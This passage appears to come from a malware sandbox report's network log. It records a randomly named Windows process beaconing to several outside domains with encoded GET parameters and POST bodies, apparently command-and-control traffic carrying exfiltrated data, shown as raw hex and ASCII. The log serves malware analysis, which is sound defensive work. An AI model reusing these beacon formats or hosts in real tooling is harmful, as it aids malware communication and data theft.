55GjL2IKTMziObUwwUdR72sIEtpAkWNkAqTIJpkHg4uqwAv6mr+TD8UEUhA4XPI/CgSFc5Fh2kFsQDETr4Qh/BCHSAZhAb5fku4D+LTGrHaaeFgmhC6DQ5MMMB8tGzkJkV2rquBdNV6Cr6Yfio2aU+9xpBC1sUoqK3ZE/bsJ37X0QG5RyrK4VxqWwZyq+u6XHJBDkdRUrdBIcbcSD64dfRpK5Q1KR/hyTPVIyW3xQCCx4l5CXPMr7cYki9hKph/nACYwZinmndEuhadjd+cJF2O/pugdsywGCgePUL8TVDs/5M+fXwOakkWUvZ2R/asNSWDzgyLdn166pALk7WJ/UIEBMxSMzzut88F9Lp/jhETsGi0tz7bUkttu/J0860WG/9iMX4u8/et2QtVI9GXqcJyr0xMPKywcI27b7kKjTCFjmx1QE7XmA/y98vKR+tnVSJE=
Apr 26, 2024 10:07:31.148698092 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 26 Apr 2024 08:07:30 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49718	116.50.37.244	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:33.686688900 CEST	514	OUT	GET /fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:07:34.018368006 CEST	887	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 26 Apr 2024 08:07:33 GMT Connection: close Content-Length: 302 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 4f 56 46 50 42 74 70 70 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 67 53 45 6c 67 69 67 75 68 49 55 31 63 71 2b 39 43 35 39 55 58 48 4d 61 44 64 50 57 56 51 3d 3d 26 61 6d 70 3b 2d 4c 58 64 38 3d 71 68 71 30 72 4e 65 70 53 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49719	46.30.213.191	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:39.665494919 CEST	789	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6d 67 49 37 69 79 4f 36 4b 70 51 30 4d 4e 36 4c 4c 71 4a 66 61 53 33 58 63 47 2b 51 Data Ascii: OVFPBtpp=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OmgI7iyO6KpQ0MN6LLqJfaS3XcG+Q
Apr 26, 2024 10:07:39.905380964 CEST	560	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Fri, 26 Apr 2024 08:17:39 GMT Last-Modified: Fri, 26 Apr 2024 08:07:39 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Fri, 26 Apr 2024 08:07:39 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 6389972505 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49720	46.30.213.191	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:42.440135956 CEST	813	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 33 77 62 68 33 34 71 37 53 51 32 4d 71 76 4e 64 77 68 4e 79 73 32 32 4d 4c 69 41 77 3d 3d Data Ascii: OVFPBtpp=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPF3wbh34q7SQ2MqvNdwhNys22MLiAw==
Apr 26, 2024 10:07:42.679970980 CEST	560	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Fri, 26 Apr 2024 08:17:42 GMT Last-Modified: Fri, 26 Apr 2024 08:07:42 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Fri, 26 Apr 2024 08:07:42 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 6236240320 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49721	46.30.213.191	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:45.224057913 CEST	1826	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 77 4f 43 71 33 36 4a 72 41 44 65 47 6d 59 51 54 54 50 79 2b 47 74 75 75 4c 31 4b 4e 46 44 53 77 31 2b 30 2b 4f 72 54 38 4a 47 69 73 38 63 4a 58 55 38 73 54 4d 77 61 33 38 63 74 35 64 64 35 64 49 35 56 39 4d 39 66 4d 35 61 31 37 58 63 55 4b 44 7a 55 6c 2f 78 33 36 52 32 49 4e 4f 62 4f 45 70 62 4e 39 2f 4f 67 4c 67 32 4c 42 78 68 75 77 30 43 77 4b 6b 4b 68 38 36 65 4d 62 43 54 58 38 72 54 63 77 74 4b 76 58 53 61 6b 77 69 73 61 6e 55 72 2f 47 6d 49 74 33 52 4b 39 36 62 50 2b 69 66 78 51 57 6b 72 50 5a 64 75 69 59 68 2f 51 44 42 79 66 6d 54 73 33 4f 6f 6c 55 4b 71 5a 62 69 50 38 79 79 71 56 73 31 70 4a 67 36 34 4a 35 45 59 62 70 54 68 63 36 41 6b 31 2f 6a 55 6f 56 72 35 62 4f 71 33 61 2f 50 4f 6f 73 68 6d 6f 74 4c 48 68 64 67 45 31 32 78 7a 44 2f 72 45 45 47 75 6b 54 4d 46 54 52 4e 47 62 36 56 4a 33 50 36 70 2b 6b 61 57 71 71 57 6a 63 78 2f 65 4a 76 2f 62 35 63 6c 48 72 6a 56 38 72 7a 30 4e 56 58 48 46 6a 6a 33 76 5a 2b 6a 4f 2b 58 4a 65 65 45 64 41 45 64 33 78 65 6d 64 2b 70 73 2f 67 6d 35 43 4f 62 34 6f 32 39 77 61 4a 74 45 55 41 2f 5a 73 47 2f 69 76 69 5a 37 6a 32 2f 4b 2b 38 6d 63 44 39 70 50 46 6c 31 49 30 79 35 55 53 6f 73 43 32 36 51 4d 2b 4e 76 46 7a 59 55 74 6b 68 2b 6b 45 56 58 6a 67 42 57 71 43 38 33 32 50 31 2f 4e 44 6e 49 39 57 52 33 38 42 4d 32 68 74 5a 63 6b 45 75 34 6e 71 63 46 47 66 39 46 35 5a 39 67 76 2b 76 49 4c 34 7a 70 71 31 44 4a 47 49 4d 72 56 57 6b 42 73 31 65 62 34 63 46 6c 39 64 35 73 37 4c 50 4e 58 6a 74 68 42 6f 61 6c 56 36 43 65 37 52 43 46 45 31 70 79 38 72 4a 59 39 32 48 2f 46 39 44 42 77 57 77 51 74 2b 46 35 68 4f 72 46 67 6e 75 4f 2b 63 6d 32 6c 43 6f 33 4b 6e 76 4c 32 7a 65 49 76 53 4d 61 44 41 50 56 5a 49 6b 78 75 44 76 4d 36 4e 4c 52 43 34 77 6e 64 5a 6a 76 6d 6e 4f 77 53 61 78 50 49 50 2b 68 4a 4e 42 71 73 53 67 44 50 77 77 70 6e 4c 44 71 61 53 65 51 79 65 6e 61 66 64 59 52 68 4d 51 44 33 61 78 4a 47 50 64 7a 63 47 66 4b 6a 68 48 61 47 39 4e 71 4c 79 39 76 33 61 6b 71 69 31 64 76 33 4f 53 47 79 42 78 31 63 6e 59 4a 49 44 77 66 54 54 4b 2f 75 47 51 6b 66 72 73 72 30 73 61 4c 2b 41 73 37 49 76 77 70 42 39 31 34 78 78 59 53 63 32 67 53 4f 33 74 6c 4a 74 41 62 47 6c 69 63 4b 58 42 41 45 65 7a 56 48 67 65 31 32 6f 6b 51 4f 63 68 4c 72 6c 65 61 70 6e 48 32 71 6a 79 4d 49 62 48 67 36 4f 36 72 35 74 35 46 56 68 32 39 63 6e 6b 66 74 78 5a 30 44 78 52 49 64 73 42 38 57 5a 73 6f 5a 2b 74 77 49 56 67 50 53 68 6f 47 6e 78 72 71 41 54 74 34 44 69 71 6a 54 4e 4c 50 69 72 35 52 66 43 7a 56 35 55 58 44 7a 79 6b 6b 34 50 67 43 71 68 35 59 41 72 42 4a 30 4a 43 50 33 73 46 55 6c 71 39 46 2f 66 4e 69 77 74 7a 67 52 38 57 32 32 49 53 34 67 34 6f 33 52 76 62 48 63 41 44 69 4f 30 34 68 4f 6e 41 6e 57 49 76 4f 52 74 36 47 4a 5a 66 35 6d 35 67 6f 79 6a 30 4a 54 58 37 47 32 4d 65 6f 51 77 53 36 59 47 74 41 33 64 4f 67 71 64 76 65 6b 74 4f 57 55 70 39 59 63 4e 2b 51 64 71 48 36 68 33 4e 4c 49 36 64 46 50 49 62 4b 49 58 74 4b 6e 71 4e 44 6b 6c 72 6b 59 53 53 6d 52 71 79 6e 59 6c 73 4d 57 73 4e 50 5a 2f 46 46 63 61 63 2b 62 4e 78 74 33 73 4d 6d 4e 45 75 68 39 56 4a 74 38 78 59 74 47 6a 51 32 54 36 4f 70 63 44 65 32 35 35 53 35 45 44 30 61 75 43 78 78 5a 48 41 53 73 42 7a 72 36 6d 6f 44 36 2f 36 30 3d Data Ascii: OVFPBtpp=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJwOCq36JrADeGmYQTTPy+GtuuL1KNFDSw1+0+OrT8JGis8cJXU8sTMwa38ct5dd5dI5V9M9fM5a17XcUKDzUl/x36R2INObOEpbN9/OgLg2LBxhuw0CwKkKh86eMbCTX8rTcwtKvXSakwisanUr/GmIt3RK96bP+ifxQWkrPZduiYh/QDByfmTs3OolUKqZbiP8yyqVs1pJg64J5EYbpThc6Ak1/jUoVr5bOq3a/POoshmotLHhdgE12xzD/rEEGukTMFTRNGb6VJ3P6p+kaWqqWjcx/eJv/b5clHrjV8rz0NVXHFjj3vZ+jO+XJeeEdAEd3xemd+ps/gm5COb4o29waJtEUA/ZsG/iviZ7j2/K+8mcD9pPFl1I0y5USosC26QM+NvFzYUtkh+kEVXjgBWqC832P1/NDnI9WR38BM2htZckEu4nqcFGf9F5Z9gv+vIL4zpq1DJGIMrVWkBs1eb4cFl9d5s7LPNXjthBoalV6Ce7RCFE1py8rJY92H/F9DBwWwQt+F5hOrFgnuO+cm2lCo3KnvL2zeIvSMaDAPVZIkxuDvM6NLRC4wndZjvmnOwSaxPIP+hJNBqsSgDPwwpnLDqaSeQyenafdYRhMQD3axJGPdzcGfKjhHaG9NqLy9v3akqi1dv3OSGyBx1cnYJIDwfTTK/uGQkfrsr0saL+As7IvwpB914xxYSc2gSO3tlJtAbGlicKXBAEezVHge12okQOchLrleapnH2qjyMIbHg6O6r5t5FVh29cnkftxZ0DxRIdsB8WZsoZ+twIVgPShoGnxrqATt4DiqjTNLPir5RfCzV5UXDzykk4PgCqh5YArBJ0JCP3sFUlq9F/fNiwtzgR8W22IS4g4o3RvbHcADiO04hOnAnWIvORt6GJZf5m5goyj0JTX7G2MeoQwS6YGtA3dOgqdvektOWUp9YcN+QdqH6h3NLI6dFPIbKIXtKnqNDklrkYSSmRqynYlsMWsNPZ/FFcac+bNxt3sMmNEuh9VJt8xYtGjQ2T6OpcDe255S5ED0auCxxZHASsBzr6moD6/60=
Apr 26, 2024 10:07:45.466198921 CEST	560	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Fri, 26 Apr 2024 08:17:45 GMT Last-Modified: Fri, 26 Apr 2024 08:07:45 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Fri, 26 Apr 2024 08:07:45 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 6625232623 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49722	46.30.213.191	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:48.839662075 CEST	513	OUT	GET /fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.antonio-vivaldi.mobi Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:07:49.085828066 CEST	852	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 313 Expires: Fri, 26 Apr 2024 08:17:48 GMT Last-Modified: Fri, 26 Apr 2024 08:07:48 GMT Date: Fri, 26 Apr 2024 08:07:48 GMT Content-Type: text/html; charset=utf-8 location: https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS X-Onecom-Cluster-Name: X-Varnish: 6453212588 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 4f 56 46 50 42 74 70 70 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 4c 47 52 58 77 5a 55 6e 59 41 32 6a 30 36 33 39 69 69 54 59 65 51 46 53 37 67 4b 67 36 41 3d 3d 26 61 6d 70 3b 2d 4c 58 64 38 3d 71 68 71 30 72 4e 65 70 53 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49723	85.159.66.93	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:55.121920109 CEST	771	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 31 32 43 52 61 72 5a 65 62 51 36 71 65 47 52 36 62 73 5a 56 37 75 7a 35 56 43 53 